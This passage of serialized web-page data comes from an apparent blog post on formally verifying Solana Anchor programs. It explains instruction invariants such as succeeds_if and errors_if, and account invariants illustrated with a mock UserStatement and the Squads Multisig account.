withdraw",{"type":27,"tag":207,"props":27545,"children":27546},{"style":238},[27547],{"type":33,"value":1343},{"type":27,"tag":207,"props":27549,"children":27550},{"style":220},[27551],{"type":33,"value":27552},"ctx",{"type":27,"tag":207,"props":27554,"children":27555},{"style":226},[27556],{"type":33,"value":736},{"type":27,"tag":207,"props":27558,"children":27559},{"style":8920},[27560],{"type":33,"value":27561}," Context",{"type":27,"tag":207,"props":27563,"children":27564},{"style":238},[27565],{"type":33,"value":9257},{"type":27,"tag":207,"props":27567,"children":27568},{"style":8920},[27569],{"type":33,"value":27451},{"type":27,"tag":207,"props":27571,"children":27572},{"style":238},[27573],{"type":33,"value":13912},{"type":27,"tag":207,"props":27575,"children":27576},{"style":220},[27577],{"type":33,"value":27578},"amount",{"type":27,"tag":207,"props":27580,"children":27581},{"style":226},[27582],{"type":33,"value":736},{"type":27,"tag":207,"props":27584,"children":27585},{"style":8920},[27586],{"type":33,"value":13142},{"type":27,"tag":207,"props":27588,"children":27589},{"style":238},[27590],{"type":33,"value":2222},{"type":27,"tag":207,"props":27592,"children":27593},{"style":226},[27594],{"type":33,"value":8968},{"type":27,"tag":207,"props":27596,"children":27597},{"style":8920},[27598],{"type":33,"value":21038},{"type":27,"tag":207,"props":27600,"children":27601},{"style":238},[27602],{"type":33,"value":27603},"\u003C()> {\n",{"type":27,"tag":207,"props":27605,"children":27606},{"class":209,"line":445},[27607],{"type":27,"tag":207,"props":27608,"children":27609},{"style":226},[27610],{"type":33,"value":27611}," ...\n",{"type":27,"tag":207,"props":27613,"children":27614},{"class":209,"line":867},[27615],{"type":27,"tag":207,"props":27616,"children":27617},{"style":238},[27618],{"type":33,"value":451},{"type":27,"tag":10222,"props":27620,"children":27621},{},[27622],{"type":27,"tag":36,"props":27623,"children":27624},{},[27625,27626,27631,27633,27638,27640,27645],{"type":33,"value":23888},{"type":27,"tag":84,"props":27627,"children":27629},{"className":27628},[],[27630],{"type":33,"value":27433},{"type":33,"value":27632}," expression specifies ",{"type":27,"tag":942,"props":27634,"children":27635},{},[27636],{"type":33,"value":27637},"succifient",{"type":33,"value":27639}," but not ",{"type":27,"tag":942,"props":27641,"children":27642},{},[27643],{"type":33,"value":27644},"necessary",{"type":33,"value":27646}," conditions for an instruction to fail. I.e. it imposes a strong lower bound on what the requirements are for an instruction to fail.",{"type":27,"tag":26063,"props":27648,"children":27649},{},[],{"type":27,"tag":36,"props":27651,"children":27652},{},[27653,27655,27660],{"type":33,"value":27654},"Another example is that for ",{"type":27,"tag":942,"props":27656,"children":27657},{},[27658],{"type":33,"value":27659},"crank",{"type":33,"value":27661}," functions — run by unauthenticated users to advance the state of the system, you may want to prove that they never fail. In that case, you could specify an invariant like the following:",{"type":27,"tag":101,"props":27663,"children":27665},{"code":27664,"language":10269,"meta":7,"className":10270,"style":7},"#[succeeds_if(true)]\nfn my_crank(ctx: Context\u003CCrank>) -> Result\u003C()> {\n ...\n}\n",[27666],{"type":27,"tag":84,"props":27667,"children":27668},{"__ignoreMap":7},[27669,27677,27731,27738],{"type":27,"tag":207,"props":27670,"children":27671},{"class":209,"line":210},[27672],{"type":27,"tag":207,"props":27673,"children":27674},{"style":238},[27675],{"type":33,"value":27676},"#[succeeds_if(true)]\n",{"type":27,"tag":207,"props":27678,"children":27679},{"class":209,"line":244},[27680,27684,27689,27693,27697,27701,27705,27709,27714,27719,27723,27727],{"type":27,"tag":207,"props":27681,"children":27682},{"style":214},[27683],{"type":33,"value":27538},{"type":27,"tag":207,"props":27685,"children":27686},{"style":1335},[27687],{"type":33,"value":27688}," my_crank",{"type":27,"tag":207,"props":27690,"children":27691},{"style":238},[27692],{"type":33,"value":1343},{"type":27,"tag":207,"props":27694,"children":27695},{"style":220},[27696],{"type":33,"value":27552},{"type":27,"tag":207,"props":27698,"children":27699},{"style":226},[27700],{"type":33,"value":736},{"type":27,"tag":207,"props":27702,"children":27703},{"style":8920},[27704],{"type":33,"value":27561},{"type":27,"tag":207,"props":27706,"children":27707},{"style":238},[27708],{"type":33,"value":9257},{"type":27,"tag":207,"props":27710,"children":27711},{"style":8920},[27712],{"type":33,"value":27713},"Crank",{"type":27,"tag":207,"props":27715,"children":27716},{"style":238},[27717],{"type":33,"value":27718},">) ",{"type":27,"tag":207,"props":27720,"children":27721},{"style":226},[27722],{"type":33,"value":8968},{"type":27,"tag":207,"props":27724,"children":27725},{"style":8920},[27726],{"type":33,"value":21038},{"type":27,"tag":207,"props":27728,"children":27729},{"style":238},[27730],{"type":33,"value":27603},{"type":27,"tag":207,"props":27732,"children":27733},{"class":209,"line":270},[27734],{"type":27,"tag":207,"props":27735,"children":27736},{"style":226},[27737],{"type":33,"value":27611},{"type":27,"tag":207,"props":27739,"children":27740},{"class":209,"line":296},[27741],{"type":27,"tag":207,"props":27742,"children":27743},{"style":238},[27744],{"type":33,"value":451},{"type":27,"tag":36,"props":27746,"children":27747},{},[27748,27750,27754,27756,27762],{"type":33,"value":27749},"With this invariant, you could prove that the function ",{"type":27,"tag":942,"props":27751,"children":27752},{},[27753],{"type":33,"value":20371},{"type":33,"value":27755}," returns ",{"type":27,"tag":84,"props":27757,"children":27759},{"className":27758},[],[27760],{"type":33,"value":27761},"Ok",{"type":33,"value":27763},". This type of construction could help avoid possible denial of service attacks if a crank could get \"stuck.\"",{"type":27,"tag":26063,"props":27765,"children":27766},{},[],{"type":27,"tag":36,"props":27768,"children":27769},{},[27770,27772,27777,27778,27783,27785,27790,27792,27797,27799,27804],{"type":33,"value":27771},"Note that ",{"type":27,"tag":84,"props":27773,"children":27775},{"className":27774},[],[27776],{"type":33,"value":27426},{"type":33,"value":1131},{"type":27,"tag":84,"props":27779,"children":27781},{"className":27780},[],[27782],{"type":33,"value":27433},{"type":33,"value":27784}," are both implications and not biconditionals. That is, a function may succeed even if ",{"type":27,"tag":84,"props":27786,"children":27788},{"className":27787},[],[27789],{"type":33,"value":27426},{"type":33,"value":27791}," is not satisfied and a function may fail even if ",{"type":27,"tag":84,"props":27793,"children":27795},{"className":27794},[],[27796],{"type":33,"value":27433},{"type":33,"value":27798}," is not satisfied. If you want to prove the ",{"type":27,"tag":942,"props":27800,"children":27801},{},[27802],{"type":33,"value":27803},"exact condition",{"type":33,"value":27805}," required for an instruction to succeed, you could use a form like the following:",{"type":27,"tag":101,"props":27807,"children":27809},{"code":27808,"language":10269,"meta":7,"className":10270,"style":7},"fn my_invariant(...) -> bool { ... }\n\n#[succeeds_if(my_invariant(...))]\n#[errors_if(!my_invariant(...))]\nfn my_instruction(ctx: Context\u003C...>) -> Result\u003C()> {\n ...\n}\n",[27810],{"type":27,"tag":84,"props":27811,"children":27812},{"__ignoreMap":7},[27813,27857,27864,27881,27907,27959,27966],{"type":27,"tag":207,"props":27814,"children":27815},{"class":209,"line":210},[27816,27820,27825,27829,27833,27837,27841,27845,27849,27853],{"type":27,"tag":207,"props":27817,"children":27818},{"style":214},[27819],{"type":33,"value":27538},{"type":27,"tag":207,"props":27821,"children":27822},{"style":1335},[27823],{"type":33,"value":27824}," my_invariant",{"type":27,"tag":207,"props":27826,"children":27827},{"style":238},[27828],{"type":33,"value":1343},{"type":27,"tag":207,"props":27830,"children":27831},{"style":226},[27832],{"type":33,"value":16867},{"type":27,"tag":207,"props":27834,"children":27835},{"style":238},[27836],{"type":33,"value":2222},{"type":27,"tag":207,"props":27838,"children":27839},{"style":226},[27840],{"type":33,"value":8968},{"type":27,"tag":207,"props":27842,"children":27843},{"style":8920},[27844],{"type":33,"value":19327},{"type":27,"tag":207,"props":27846,"children":27847},{"style":238},[27848],{"type":33,"value":16862},{"type":27,"tag":207,"props":27850,"children":27851},{"style":226},[27852],{"type":33,"value":16867},{"type":27,"tag":207,"props":27854,"children":27855},{"style":238},[27856],{"type":33,"value":16872},{"type":27,"tag":207,"props":27858,"children":27859},{"class":209,"line":244},[27860],{"type":27,"tag":207,"props":27861,"children":27862},{"emptyLinePlaceholder":19},[27863],{"type":33,"value":2062},{"type":27,"tag":207,"props":27865,"children":27866},{"class":209,"line":270},[27867,27872,27876],{"type":27,"tag":207,"props":27868,"children":27869},{"style":238},[27870],{"type":33,"value":27871},"#[succeeds_if(my_invariant(",{"type":27,"tag":207,"props":27873,"children":27874},{"style":226},[27875],{"type":33,"value":16867},{"type":27,"tag":207,"props":27877,"children":27878},{"style":238},[27879],{"type":33,"value":27880},"))]\n",{"type":27,"tag":207,"props":27882,"children":27883},{"class":209,"line":296},[27884,27889,27894,27899,27903],{"type":27,"tag":207,"props":27885,"children":27886},{"style":238},[27887],{"type":33,"value":27888},"#[errors_if(",{"type":27,"tag":207,"props":27890,"children":27891},{"style":226},[27892],{"type":33,"value":27893},"!",{"type":27,"tag":207,"props":27895,"children":27896},{"style":238},[27897],{"type":33,"value":27898},"my_invariant(",{"type":27,"tag":207,"props":27900,"children":27901},{"style":226},[27902],{"type":33,"value":16867},{"type":27,"tag":207,"props":27904,"children":27905},{"style":238},[27906],{"type":33,"value":27880},{"type":27,"tag":207,"props":27908,"children":27909},{"class":209,"line":445},[27910,27914,27919,27923,27927,27931,27935,27939,27943,27947,27951,27955],{"type":27,"tag":207,"props":27911,"children":27912},{"style":214},[27913],{"type":33,"value":27538},{"type":27,"tag":207,"props":27915,"children":27916},{"style":1335},[27917],{"type":33,"value":27918}," my_instruction",{"type":27,"tag":207,"props":27920,"children":27921},{"style":238},[27922],{"type":33,"value":1343},{"type":27,"tag":207,"props":27924,"children":27925},{"style":220},[27926],{"type":33,"value":27552},{"type":27,"tag":207,"props":27928,"children":27929},{"style":226},[27930],{"type":33,"value":736},{"type":27,"tag":207,"props":27932,"children":27933},{"style":8920},[27934],{"type":33,"value":27561},{"type":27,"tag":207,"props":27936,"children":27937},{"style":238},[27938],{"type":33,"value":9257},{"type":27,"tag":207,"props":27940,"children":27941},{"style":226},[27942],{"type":33,"value":16867},{"type":27,"tag":207,"props":27944,"children":27945},{"style":238},[27946],{"type":33,"value":27718},{"type":27,"tag":207,"props":27948,"children":27949},{"style":226},[27950],{"type":33,"value":8968},{"type":27,"tag":207,"props":27952,"children":27953},{"style":8920},[27954],{"type":33,"value":21038},{"type":27,"tag":207,"props":27956,"children":27957},{"style":238},[27958],{"type":33,"value":27603},{"type":27,"tag":207,"props":27960,"children":27961},{"class":209,"line":867},[27962],{"type":27,"tag":207,"props":27963,"children":27964},{"style":226},[27965],{"type":33,"value":27611},{"type":27,"tag":207,"props":27967,"children":27968},{"class":209,"line":892},[27969],{"type":27,"tag":207,"props":27970,"children":27971},{"style":238},[27972],{"type":33,"value":451},{"type":27,"tag":36,"props":27974,"children":27975},{},[27976],{"type":33,"value":27977},"Note that in practice, it is usually not necessary (or useful) to find the exact condition; rather we can achieve the security properties we want purely by proving upper and lower bounds on instruction success.",{"type":27,"tag":26163,"props":27979,"children":27981},{"id":27980},"account-invariants",[27982],{"type":33,"value":27983},"Account Invariants",{"type":27,"tag":36,"props":27985,"children":27986},{},[27987,27989,27994],{"type":33,"value":27988},"The other type of invariant is an ",{"type":27,"tag":12606,"props":27990,"children":27991},{},[27992],{"type":33,"value":27993},"Account Invariant",{"type":33,"value":27995},". This invariant describes some property of an account that should always hold.",{"type":27,"tag":36,"props":27997,"children":27998},{},[27999,28001,28006,28007,28013],{"type":33,"value":28000},"In our tool, we verify that the account invariant holds after every instruction that could modify the account data (i.e. if the account is ",{"type":27,"tag":84,"props":28002,"children":28004},{"className":28003},[],[28005],{"type":33,"value":11009},{"type":33,"value":20411},{"type":27,"tag":84,"props":28008,"children":28010},{"className":28009},[],[28011],{"type":33,"value":28012},"init",{"type":33,"value":28014},").",{"type":27,"tag":36,"props":28016,"children":28017},{},[28018,28020,28026],{"type":33,"value":28019},"For example, given a mock ",{"type":27,"tag":84,"props":28021,"children":28023},{"className":28022},[],[28024],{"type":33,"value":28025},"UserStatement",{"type":33,"value":28027}," account that represents how much a user owns and owes, we could write an invariant that asserts that the net balance is positive:",{"type":27,"tag":101,"props":28029,"children":28031},{"code":28030,"language":10269,"meta":7,"className":10270,"style":7},"#[account]\n#[invariant(\n self.assets >= self.liabilities\n)]\nstruct UserStatement {\n pub owner: Pubkey,\n pub assets: u64,\n pub liabilities: u64,\n}\n",[28032],{"type":27,"tag":84,"props":28033,"children":28034},{"__ignoreMap":7},[28035,28043,28051,28085,28092,28108,28134,28158,28182],{"type":27,"tag":207,"props":28036,"children":28037},{"class":209,"line":210},[28038],{"type":27,"tag":207,"props":28039,"children":28040},{"style":238},[28041],{"type":33,"value":28042},"#[account]\n",{"type":27,"tag":207,"props":28044,"children":28045},{"class":209,"line":244},[28046],{"type":27,"tag":207,"props":28047,"children":28048},{"style":238},[28049],{"type":33,"value":28050},"#[invariant(\n",{"type":27,"tag":207,"props":28052,"children":28053},{"class":209,"line":270},[28054,28059,28063,28068,28072,28076,28080],{"type":27,"tag":207,"props":28055,"children":28056},{"style":238},[28057],{"type":33,"value":28058}," self",{"type":27,"tag":207,"props":28060,"children":28061},{"style":226},[28062],{"type":33,"value":1041},{"type":27,"tag":207,"props":28064,"children":28065},{"style":238},[28066],{"type":33,"value":28067},"assets ",{"type":27,"tag":207,"props":28069,"children":28070},{"style":226},[28071],{"type":33,"value":17220},{"type":27,"tag":207,"props":28073,"children":28074},{"style":238},[28075],{"type":33,"value":21073},{"type":27,"tag":207,"props":28077,"children":28078},{"style":226},[28079],{"type":33,"value":1041},{"type":27,"tag":207,"props":28081,"children":28082},{"style":238},[28083],{"type":33,"value":28084},"liabilities\n",{"type":27,"tag":207,"props":28086,"children":28087},{"class":209,"line":296},[28088],{"type":27,"tag":207,"props":28089,"children":28090},{"style":238},[28091],{"type":33,"value":27530},{"type":27,"tag":207,"props":28093,"children":28094},{"class":209,"line":445},[28095,28099,28104],{"type":27,"tag":207,"props":28096,"children":28097},{"style":214},[28098],{"type":33,"value":16677},{"type":27,"tag":207,"props":28100,"children":28101},{"style":8920},[28102],{"type":33,"value":28103}," UserStatement",{"type":27,"tag":207,"props":28105,"children":28106},{"style":238},[28107],{"type":33,"value":384},{"type":27,"tag":207,"props":28109,"children":28110},{"class":209,"line":867},[28111,28116,28121,28125,28130],{"type":27,"tag":207,"props":28112,"children":28113},{"style":214},[28114],{"type":33,"value":28115}," pub",{"type":27,"tag":207,"props":28117,"children":28118},{"style":220},[28119],{"type":33,"value":28120}," owner",{"type":27,"tag":207,"props":28122,"children":28123},{"style":226},[28124],{"type":33,"value":736},{"type":27,"tag":207,"props":28126,"children":28127},{"style":8920},[28128],{"type":33,"value":28129}," Pubkey",{"type":27,"tag":207,"props":28131,"children":28132},{"style":238},[28133],{"type":33,"value":1842},{"type":27,"tag":207,"props":28135,"children":28136},{"class":209,"line":892},[28137,28141,28146,28150,28154],{"type":27,"tag":207,"props":28138,"children":28139},{"style":214},[28140],{"type":33,"value":28115},{"type":27,"tag":207,"props":28142,"children":28143},{"style":220},[28144],{"type":33,"value":28145}," assets",{"type":27,"tag":207,"props":28147,"children":28148},{"style":226},[28149],{"type":33,"value":736},{"type":27,"tag":207,"props":28151,"children":28152},{"style":8920},[28153],{"type":33,"value":13142},{"type":27,"tag":207,"props":28155,"children":28156},{"style":238},[28157],{"type":33,"value":1842},{"type":27,"tag":207,"props":28159,"children":28160},{"class":209,"line":1475},[28161,28165,28170,28174,28178],{"type":27,"tag":207,"props":28162,"children":28163},{"style":214},[28164],{"type":33,"value":28115},{"type":27,"tag":207,"props":28166,"children":28167},{"style":220},[28168],{"type":33,"value":28169}," liabilities",{"type":27,"tag":207,"props":28171,"children":28172},{"style":226},[28173],{"type":33,"value":736},{"type":27,"tag":207,"props":28175,"children":28176},{"style":8920},[28177],{"type":33,"value":13142},{"type":27,"tag":207,"props":28179,"children":28180},{"style":238},[28181],{"type":33,"value":1842},{"type":27,"tag":207,"props":28183,"children":28184},{"class":209,"line":2065},[28185],{"type":27,"tag":207,"props":28186,"children":28187},{"style":238},[28188],{"type":33,"value":451},{"type":27,"tag":36,"props":28190,"children":28191},{},[28192,28194,28199],{"type":33,"value":28193},"Our tool automatically generates the relevant harnesses to ensure that this property holds every time an account of type ",{"type":27,"tag":84,"props":28195,"children":28197},{"className":28196},[],[28198],{"type":33,"value":28025},{"type":33,"value":28200}," is created or modified.",{"type":27,"tag":36,"props":28202,"children":28203},{},[28204,28206,28212],{"type":33,"value":28205},"In another example, we developed the following invariant for the ",{"type":27,"tag":47,"props":28207,"children":28209},{"href":26094,"rel":28208},[51],[28210],{"type":33,"value":28211},"Squads Multisig",{"type":33,"value":28213}," wallet account:",{"type":27,"tag":101,"props":28215,"children":28217},{"code":28216,"language":10269,"meta":7,"className":10270,"style":7},"#[account]\n#[invariant(\n !self.keys.is_empty()\n && (self.keys.len() \u003C= u16::MAX as usize)\n && (self.threshold >= 1)\n && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n pub threshold: u16, // threshold for signatures\n pub authority_index: u16, // index to seed other authorities under this multisig\n pub transaction_index: u32, // look up and seed reference for transactions\n pub ms_change_index: u32, // the last executed/closed transaction\n pub bump: u8, // bump for the multisig seed\n pub create_key: Pubkey, // random key(or not) used to seed the multisig pda\n pub allow_external_execute: bool, // allow non-member keys to execute txs\n pub keys: Vec\u003CPubkey>, // keys of the members\n}\n",[28218],{"type":27,"tag":84,"props":28219,"children":28220},{"__ignoreMap":7},[28221,28228,28235,28265,28324,28353,28405,28412,28433,28463,28493,28523,28552,28582,28612,28641,28681],{"type":27,"tag":207,"props":28222,"children":28223},{"class":209,"line":210},[28224],{"type":27,"tag":207,"props":28225,"children":28226},{"style":238},[28227],{"type":33,"value":28042},{"type":27,"tag":207,"props":28229,"children":28230},{"class":209,"line":244},[28231],{"type":27,"tag":207,"props":28232,"children":28233},{"style":238},[28234],{"type":33,"value":28050},{"type":27,"tag":207,"props":28236,"children":28237},{"class":209,"line":270},[28238,28243,28247,28251,28256,28260],{"type":27,"tag":207,"props":28239,"children":28240},{"style":226},[28241],{"type":33,"value":28242}," !",{"type":27,"tag":207,"props":28244,"children":28245},{"style":238},[28246],{"type":33,"value":20990},{"type":27,"tag":207,"props":28248,"children":28249},{"style":226},[28250],{"type":33,"value":1041},{"type":27,"tag":207,"props":28252,"children":28253},{"style":238},[28254],{"type":33,"value":28255},"keys",{"type":27,"tag":207,"props":28257,"children":28258},{"style":226},[28259],{"type":33,"value":1041},{"type":27,"tag":207,"props":28261,"children":28262},{"style":238},[28263],{"type":33,"value":28264},"is_empty()\n",{"type":27,"tag":207,"props":28266,"children":28267},{"class":209,"line":296},[28268,28272,28277,28281,28285,28289,28294,28298,28303,28307,28312,28316,28320],{"type":27,"tag":207,"props":28269,"children":28270},{"style":226},[28271],{"type":33,"value":22896},{"type":27,"tag":207,"props":28273,"children":28274},{"style":238},[28275],{"type":33,"value":28276}," (self",{"type":27,"tag":207,"props":28278,"children":28279},{"style":226},[28280],{"type":33,"value":1041},{"type":27,"tag":207,"props":28282,"children":28283},{"style":238},[28284],{"type":33,"value":28255},{"type":27,"tag":207,"props":28286,"children":28287},{"style":226},[28288],{"type":33,"value":1041},{"type":27,"tag":207,"props":28290,"children":28291},{"style":238},[28292],{"type":33,"value":28293},"len() ",{"type":27,"tag":207,"props":28295,"children":28296},{"style":226},[28297],{"type":33,"value":26685},{"type":27,"tag":207,"props":28299,"children":28300},{"style":8920},[28301],{"type":33,"value":28302}," u16",{"type":27,"tag":207,"props":28304,"children":28305},{"style":226},[28306],{"type":33,"value":10768},{"type":27,"tag":207,"props":28308,"children":28309},{"style":8920},[28310],{"type":33,"value":28311},"MAX",{"type":27,"tag":207,"props":28313,"children":28314},{"style":214},[28315],{"type":33,"value":16108},{"type":27,"tag":207,"props":28317,"children":28318},{"style":8920},[28319],{"type":33,"value":21008},{"type":27,"tag":207,"props":28321,"children":28322},{"style":238},[28323],{"type":33,"value":10449},{"type":27,"tag":207,"props":28325,"children":28326},{"class":209,"line":445},[28327,28331,28335,28339,28344,28348],{"type":27,"tag":207,"props":28328,"children":28329},{"style":226},[28330],{"type":33,"value":22896},{"type":27,"tag":207,"props":28332,"children":28333},{"style":238},[28334],{"type":33,"value":28276},{"type":27,"tag":207,"props":28336,"children":28337},{"style":226},[28338],{"type":33,"value":1041},{"type":27,"tag":207,"props":28340,"children":28341},{"style":238},[28342],{"type":33,"value":28343},"threshold ",{"type":27,"tag":207,"props":28345,"children":28346},{"style":226},[28347],{"type":33,"value":17220},{"type":27,"tag":207,"props":28349,"children":28350},{"style":238},[28351],{"type":33,"value":28352}," 1)\n",{"type":27,"tag":207,"props":28354,"children":28355},{"class":209,"line":867},[28356,28360,28364,28368,28372,28376,28380,28384,28388,28392,28396,28400],{"type":27,"tag":207,"props":28357,"children":28358},{"style":226},[28359],{"type":33,"value":22896},{"type":27,"tag":207,"props":28361,"children":28362},{"style":238},[28363],{"type":33,"value":28276},{"type":27,"tag":207,"props":28365,"children":28366},{"style":226},[28367],{"type":33,"value":1041},{"type":27,"tag":207,"props":28369,"children":28370},{"style":238},[28371],{"type":33,"value":28343},{"type":27,"tag":207,"props":28373,"children":28374},{"style":214},[28375],{"type":33,"value":16122},{"type":27,"tag":207,"props":28377,"children":28378},{"style":8920},[28379],{"type":33,"value":21008},{"type":27,"tag":207,"props":28381,"children":28382},{"style":226},[28383],{"type":33,"value":15478},{"type":27,"tag":207,"props":28385,"children":28386},{"style":238},[28387],{"type":33,"value":21073},{"type":27,"tag":207,"props":28389,"children":28390},{"style":226},[28391],{"type":33,"value":1041},{"type":27,"tag":207,"props":28393,"children":28394},{"style":238},[28395],{"type":33,"value":28255},{"type":27,"tag":207,"props":28397,"children":28398},{"style":226},[28399],{"type":33,"value":1041},{"type":27,"tag":207,"props":28401,"children":28402},{"style":238},[28403],{"type":33,"value":28404},"len())\n",{"type":27,"tag":207,"props":28406,"children":28407},{"class":209,"line":892},[28408],{"type":27,"tag":207,"props":28409,"children":28410},{"style":238},[28411],{"type":33,"value":27530},{"type":27,"tag":207,"props":28413,"children":28414},{"class":209,"line":1475},[28415,28419,28424,28429],{"type":27,"tag":207,"props":28416,"children":28417},{"style":214},[28418],{"type":33,"value":20967},{"type":27,"tag":207,"props":28420,"children":28421},{"style":214},[28422],{"type":33,"value":28423}," struct",{"type":27,"tag":207,"props":28425,"children":28426},{"style":8920},[28427],{"type":33,"value":28428}," Ms",{"type":27,"tag":207,"props":28430,"children":28431},{"style":238},[28432],{"type":33,"value":384},{"type":27,"tag":207,"props":28434,"children":28435},{"class":209,"line":2065},[28436,28440,28445,28449,28453,28458],{"type":27,"tag":207,"props":28437,"children":28438},{"style":214},[28439],{"type":33,"value":28115},{"type":27,"tag":207,"props":28441,"children":28442},{"style":220},[28443],{"type":33,"value":28444}," threshold",{"type":27,"tag":207,"props":28446,"children":28447},{"style":226},[28448],{"type":33,"value":736},{"type":27,"tag":207,"props":28450,"children":28451},{"style":8920},[28452],{"type":33,"value":28302},{"type":27,"tag":207,"props":28454,"children":28455},{"style":238},[28456],{"type":33,"value":28457},", ",{"type":27,"tag":207,"props":28459,"children":28460},{"style":4647},[28461],{"type":33,"value":28462},"// threshold for signatures\n",{"type":27,"tag":207,"props":28464,"children":28465},{"class":209,"line":2092},[28466,28470,28475,28479,28483,28488],{"type":27,"tag":207,"props":28467,"children":28468},{"style":214},[28469],{"type":33,"value":28115},{"type":27,"tag":207,"props":28471,"children":28472},{"style":220},[28473],{"type":33,"value":28474}," authority_index",{"type":27,"tag":207,"props":28476,"children":28477},{"style":226},[28478],{"type":33,"value":736},{"type":27,"tag":207,"props":28480,"children":28481},{"style":8920},[28482],{"type":33,"value":28302},{"type":27,"tag":207,"props":28484,"children":28485},{"style":238},[28486],{"type":33,"value":28487},", ",{"type":27,"tag":207,"props":28489,"children":28490},{"style":4647},[28491],{"type":33,"value":28492},"// index to seed other authorities under this multisig\n",{"type":27,"tag":207,"props":28494,"children":28495},{"class":209,"line":2130},[28496,28500,28505,28509,28513,28518],{"type":27,"tag":207,"props":28497,"children":28498},{"style":214},[28499],{"type":33,"value":28115},{"type":27,"tag":207,"props":28501,"children":28502},{"style":220},[28503],{"type":33,"value":28504}," transaction_index",{"type":27,"tag":207,"props":28506,"children":28507},{"style":226},[28508],{"type":33,"value":736},{"type":27,"tag":207,"props":28510,"children":28511},{"style":8920},[28512],{"type":33,"value":24820},{"type":27,"tag":207,"props":28514,"children":28515},{"style":238},[28516],{"type":33,"value":28517},", ",{"type":27,"tag":207,"props":28519,"children":28520},{"style":4647},[28521],{"type":33,"value":28522},"// look up and seed reference for transactions\n",{"type":27,"tag":207,"props":28524,"children":28525},{"class":209,"line":2168},[28526,28530,28535,28539,28543,28547],{"type":27,"tag":207,"props":28527,"children":28528},{"style":214},[28529],{"type":33,"value":28115},{"type":27,"tag":207,"props":28531,"children":28532},{"style":220},[28533],{"type":33,"value":28534}," ms_change_index",{"type":27,"tag":207,"props":28536,"children":28537},{"style":226},[28538],{"type":33,"value":736},{"type":27,"tag":207,"props":28540,"children":28541},{"style":8920},[28542],{"type":33,"value":24820},{"type":27,"tag":207,"props":28544,"children":28545},{"style":238},[28546],{"type":33,"value":28487},{"type":27,"tag":207,"props":28548,"children":28549},{"style":4647},[28550],{"type":33,"value":28551},"// the last executed/closed transaction\n",{"type":27,"tag":207,"props":28553,"children":28554},{"class":209,"line":4095},[28555,28559,28564,28568,28572,28577],{"type":27,"tag":207,"props":28556,"children":28557},{"style":214},[28558],{"type":33,"value":28115},{"type":27,"tag":207,"props":28560,"children":28561},{"style":220},[28562],{"type":33,"value":28563}," bump",{"type":27,"tag":207,"props":28565,"children":28566},{"style":226},[28567],{"type":33,"value":736},{"type":27,"tag":207,"props":28569,"children":28570},{"style":8920},[28571],{"type":33,"value":21910},{"type":27,"tag":207,"props":28573,"children":28574},{"style":238},[28575],{"type":33,"value":28576},", ",{"type":27,"tag":207,"props":28578,"children":28579},{"style":4647},[28580],{"type":33,"value":28581},"// bump for the multisig seed\n",{"type":27,"tag":207,"props":28583,"children":28584},{"class":209,"line":4103},[28585,28589,28594,28598,28602,28607],{"type":27,"tag":207,"props":28586,"children":28587},{"style":214},[28588],{"type":33,"value":28115},{"type":27,"tag":207,"props":28590,"children":28591},{"style":220},[28592],{"type":33,"value":28593}," create_key",{"type":27,"tag":207,"props":28595,"children":28596},{"style":226},[28597],{"type":33,"value":736},{"type":27,"tag":207,"props":28599,"children":28600},{"style":8920},[28601],{"type":33,"value":28129},{"type":27,"tag":207,"props":28603,"children":28604},{"style":238},[28605],{"type":33,"value":28606},", ",{"type":27,"tag":207,"props":28608,"children":28609},{"style":4647},[28610],{"type":33,"value":28611},"// random key(or not) used to seed the multisig pda\n",{"type":27,"tag":207,"props":28613,"children":28614},{"class":209,"line":4154},[28615,28619,28624,28628,28632,28636],{"type":27,"tag":207,"props":28616,"children":28617},{"style":214},[28618],{"type":33,"value":28115},{"type":27,"tag":207,"props":28620,"children":28621},{"style":220},[28622],{"type":33,"value":28623}," allow_external_execute",{"type":27,"tag":207,"props":28625,"children":28626},{"style":226},[28627],{"type":33,"value":736},{"type":27,"tag":207,"props":28629,"children":28630},{"style":8920},[28631],{"type":33,"value":19327},{"type":27,"tag":207,"props":28633,"children":28634},{"style":238},[28635],{"type":33,"value":1123},{"type":27,"tag":207,"props":28637,"children":28638},{"style":4647},[28639],{"type":33,"value":28640},"// allow non-member keys to execute txs\n",{"type":27,"tag":207,"props":28642,"children":28643},{"class":209,"line":4203},[28644,28648,28653,28657,28662,28666,28671,28676],{"type":27,"tag":207,"props":28645,"children":28646},{"style":214},[28647],{"type":33,"value":28115},{"type":27,"tag":207,"props":28649,"children":28650},{"style":220},[28651],{"type":33,"value":28652}," keys",{"type":27,"tag":207,"props":28654,"children":28655},{"style":226},[28656],{"type":33,"value":736},{"type":27,"tag":207,"props":28658,"children":28659},{"style":8920},[28660],{"type":33,"value":28661}," Vec",{"type":27,"tag":207,"props":28663,"children":28664},{"style":238},[28665],{"type":33,"value":9257},{"type":27,"tag":207,"props":28667,"children":28668},{"style":8920},[28669],{"type":33,"value":28670},"Pubkey",{"type":27,"tag":207,"props":28672,"children":28673},{"style":238},[28674],{"type":33,"value":28675},">, ",{"type":27,"tag":207,"props":28677,"children":28678},{"style":4647},[28679],{"type":33,"value":28680},"// keys of the members\n",{"type":27,"tag":207,"props":28682,"children":28683},{"class":209,"line":4249},[28684],{"type":27,"tag":207,"props":28685,"children":28686},{"style":238},[28687],{"type":33,"value":451},{"type":27,"tag":36,"props":28689,"children":28690},{},[28691],{"type":33,"value":28692},"Here we are verifying multiple things at once:",{"type":27,"tag":1228,"props":28694,"children":28695},{},[28696,28707,28718,28729],{"type":27,"tag":1232,"props":28697,"children":28698},{},[28699,28705],{"type":27,"tag":84,"props":28700,"children":28702},{"className":28701},[],[28703],{"type":33,"value":28704},"!self.keys.is_empty()",{"type":33,"value":28706}," : ensure there is at least one member",{"type":27,"tag":1232,"props":28708,"children":28709},{},[28710,28716],{"type":27,"tag":84,"props":28711,"children":28713},{"className":28712},[],[28714],{"type":33,"value":28715},"self.keys.len() \u003C= u16::MAX as usize",{"type":33,"value":28717}," : set an upper limit of 65535 members",{"type":27,"tag":1232,"props":28719,"children":28720},{},[28721,28727],{"type":27,"tag":84,"props":28722,"children":28724},{"className":28723},[],[28725],{"type":33,"value":28726},"self.threshold >= 1",{"type":33,"value":28728}," : ensure we always need at least one member to sign (threshold of zero would require no signers!)",{"type":27,"tag":1232,"props":28730,"children":28731},{},[28732,28738],{"type":27,"tag":84,"props":28733,"children":28735},{"className":28734},[],[28736],{"type":33,"value":28737},"self.threshold as usize \u003C= self.keys.len()",{"type":33,"value":28739}," : ensure we always have enough potential members to sign; if threshold was greater than the number of keys, no one could 